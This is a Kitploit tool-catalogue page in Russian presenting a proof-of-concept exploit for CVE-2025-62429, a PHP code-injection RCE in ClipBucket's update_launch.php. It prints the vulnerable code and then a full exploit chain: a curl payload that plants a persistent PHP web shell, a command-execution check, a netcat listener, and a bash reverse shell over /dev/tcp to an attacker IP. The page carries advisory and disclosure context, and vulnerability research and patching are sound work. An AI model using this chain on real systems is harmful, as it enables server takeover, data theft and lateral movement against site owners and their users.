Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-62429 — CVE-2025-62429 | clipbucket RCE | Kitploit
Инструменты/GitHubGitHub/drkim-dev/cve-2025-62429
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubdrkim-dev/cve-2025-62429

CVE-2025-62429

CVE-2025-62429 | clipbucket RCE

Репозиторий
114 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-62429 PoC - RCE в clipbucket

Proof-of-Concept для RCE через внедрение PHP-кода в update_launch.php

Раскрытие: Первоначально сообщено мной через GHSA-3h9c-7j8r-xc3v

⚠️ Только для авторизованного пентеста/исследований.

Информация об уязвимости

ПолеЗначение
CVE IDCVE-2025-62429
Серьёзность🔴 Высокая
Оценка CVSS7.2
Вектор CVSS[CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H]
CWECWE-78: внедрение команд ОС, CWE-94: внедрение кода
Затронутый продуктClibBucket <= 5.5.3 - #79
Исправленная версия5.5.3 - #80
Уведомление об уязвимостиGHSA-3h9c-7j8r-xc3v

CVE-2025-62429: аутентифицированное удалённое выполнение кода (RCE) через внедрение PHP-кода в update_launch.php

Краткое описание

В ClipBucket v5.5.3-61 существует уязвимость аутентифицированного удалённого выполнения кода (RCE). Уязвимость классифицируется как CWE-94: некорректный контроль генерации кода ('внедрение кода'). Приложение не выполняет надлежащую очистку вводимых пользователем данных, используемых для генерации исполняемого PHP-кода в update_launch.php. Аутентифицированный администратор может использовать эту уязвимость для полного выполнения команд на сервере, повышая привилегии с веб-администратора до системного пользователя (например, containeruser).


Подробности

Уязвимость находится в upload/admin_area/actions/update_launch.php. Этот скрипт обеспечивает обновление системы, динамически генерируя временный фоновый PHP-скрипт.

Фрагмент уязвимого кода: upload/admin_area/actions/update_launch.php (строки 40-86)

root@kitploit:~
// User input from $_POST['type'] is directly concatenated into a PHP string.
$data = '<?php
if (php_sapi_name() != \'cli\') { die; }
...
$type = \'' . $_POST['type'] . '\'; // <--- VULNERABILITY: Direct concatenation
...
?>';
fwrite($tmp_file, $data);
fclose($tmp_file);

// The generated file is executed via shell_exec using the PHP CLI.
$cmd = System::get_binaries('php') . ' -q ' . DirPath::get('temp') . 'update_core_tmp.php';
shell_exec($cmd);
image image

Механизм эксплуатации: Поскольку параметр type конкатенируется в строку $data без экранирования или очистки, злоумышленник может использовать одинарную кавычку ('), чтобы выйти из контекста строкового литерала. Затем он может внедрить произвольные PHP-функции (такие как system() или file_put_contents()) и закомментировать остальную часть исходного кода с помощью //. В результате выполняется код, предоставленный злоумышленником, с привилегиями процесса PHP-CLI.


Предварительные условия

  • Уровень доступа: права администратора.
  • Аутентификация: действительный файл cookie сессии PHPSESSID. image

PoC (доказательство концепции)

Этап 1: Проверка и развёртывание веб-шелла (закрепление)

Сначала продемонстрируем уязвимость, развернув постоянный веб-шелл в корневом каталоге веб-сервера.

  1. Отправьте специально сформированный POST-запрос на уязвимую конечную точку:
root@kitploit:~
curl -X POST "http://[TARGET_IP]/admin_area/actions/update_launch.php" \
-H "Cookie: PHPSESSID=[ADMIN_SESSION_ID]" \
-d "type=core'; file_put_contents(dirname(__DIR__, 2).'/vuln.php', '<?php system(\$_GET[\"cmd\"]); ?>'); //"
image
  1. Подтвердите выполнение, запросив идентификатор системы:
root@kitploit:~
curl -s "http://[TARGET_IP]/vuln.php?cmd=id"
# Expected Response: uid=1000(containeruser) gid=1000(containeruser) ...
image

Этап 2: Обратный шелл (полный контроль над системой)

После подтверждения RCE устанавливается интерактивный шелл для пост-эксплуатации.

  1. Запустите Netcat-слушатель на машине атакующего:
root@kitploit:~
nc -lvnp 4444
image
  1. Запустите обратный шелл через развёрнутый веб-шелл:
root@kitploit:~
curl -G "http://[TARGET_IP]/vuln.php" \
--data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/[KALI_IP]/4444 0>&1'"
image image

Машина атакующего получает соединение, предоставляющее полный интерактивный доступ к шеллу под пользователем containeruser.


Влияние

Успешная эксплуатация позволяет атакующему выполнять произвольные системные команды. Это приводит к:

  • Полный доступ к данным: возможность чтения конфиденциальных файлов конфигурации (например, config.inc.php) и всей базы данных.
  • Нарушение целостности системы: изменение или удаление любого файла, доступного процессу веб-сервера.
  • Горизонтальное перемещение (Lateral Movement): скомпрометированный хост может служить плацдармом для дальнейших атак во внутренней инфраструктуре.

Связанное уведомление / ссылка на CVE

Эта проблема связана с ранее раскрытой уязвимостью:

  • GHSA-3x4g-x3gv-rjmq
  • CVE-2025-62429

При дальнейшем анализе было установлено, что уязвимость сохраняется в ClipBucket v5.5.3 из-за неполного исправления.
Хотя исходное уведомление закрывало часть проблемы, вектор внедрения PHP-кода через параметр type в update_launch.php оставался эксплуатируемым.

Данное уведомление содержит дополнительные технические детали, проверку на последней версии и полный сквозной сценарий эксплуатации.

Скачать инструмент